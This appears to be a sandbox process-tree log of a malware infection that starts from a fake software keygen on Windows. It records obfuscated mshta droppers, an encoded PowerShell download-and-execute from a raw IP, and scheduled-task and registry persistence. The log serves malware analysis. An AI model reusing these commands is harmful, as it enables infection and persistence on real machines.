C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "" == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed094c47c32b.exe" ) do taskkill -f -im "%~nxL"8⤵
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF "" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF " == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" ) do taskkill -f -im "%~nxL"11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt: closE ( CrEaTeoBJecT ( "WsCRiPT.ShEll" ). RuN ( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe5⤵
-
C:\Users\Admin\Desktop\Psglobal59_5_9_0_serial_keygen.exe"C:\Users\Admin\Desktop\Psglobal59_5_9_0_serial_keygen.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exekeygen-step-6.exe4⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"5⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\raserver.exe"C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\9t_XgksU4Dzwi6egFQDvx1fp.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\6BE6.exeC:\Users\Admin\AppData\Local\Temp\6BE6.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\6C84.exeC:\Users\Admin\AppData\Local\Temp\6C84.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\6C84.exeC:\Users\Admin\AppData\Local\Temp\6C84.exe3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\C39D.exeC:\Users\Admin\AppData\Local\Temp\C39D.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\D2B2.exeC:\Users\Admin\AppData\Local\Temp\D2B2.exe2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2DB.exeC:\Users\Admin\AppData\Local\Temp\2DB.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\18A6.exeC:\Users\Admin\AppData\Local\Temp\18A6.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\5⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\442C.exeC:\Users\Admin\AppData\Local\Temp\442C.exe2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\xtmp4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp79904.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp79904.bat"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp99504.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp99504.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp79904.bat "C:\Users\Admin\AppData\Local\Temp\442C.exe"3⤵
- Blocklisted process makes network request
- Checks computer location settings
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp79904.bat "C:\Users\Admin\AppData\Local\Temp\442C.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA5⤵
-
C:\Users\Admin\AppData\Local\Temp\53BD.exeC:\Users\Admin\AppData\Local\Temp\53BD.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\5FE3.exeC:\Users\Admin\AppData\Local\Temp\5FE3.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\6B2F.exeC:\Users\Admin\AppData\Local\Temp\6B2F.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed096a1bff61.exeWed096a1bff61.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\3436435.exe"C:\Users\Admin\AppData\Roaming\3436435.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1279925.exe"C:\Users\Admin\AppData\Roaming\1279925.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2564110.exe"C:\Users\Admin\AppData\Roaming\2564110.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1437001.exe"C:\Users\Admin\AppData\Roaming\1437001.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3633257.exe"C:\Users\Admin\AppData\Roaming\3633257.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\6986306.exe"C:\Users\Admin\AppData\Roaming\6986306.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\1535412.exe"C:\Users\Admin\AppData\Roaming\1535412.exe"4⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5440 -s 15284⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 7964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 8164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 8484⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 8804⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"5⤵
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6020 -s 15084⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09e95ff6b5.exeWed09e95ff6b5.exe1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Public\run.exeC:\Users\Public\run.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 2763⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09c42cad92c20f79.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09c42cad92c20f79.exe" & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed09c42cad92c20f79.exe" /f3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09d27135e5a8b3b.exe" /SILENT1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-U8PVJ.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-U8PVJ.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$20330,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09d27135e5a8b3b.exe" /SILENT2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-4T9PK.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-4T9PK.tmp\postback.exe" ss13⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-2197U.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-2197U.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$10328,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS03D09C37\Wed09d27135e5a8b3b.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5041E06659A75B51296CE906E7278FC7 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 14A39AC04B5C6626C53BEC126CE711E32⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2f28fcb4-53d9-6f49-92db-23343200fc48}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
-
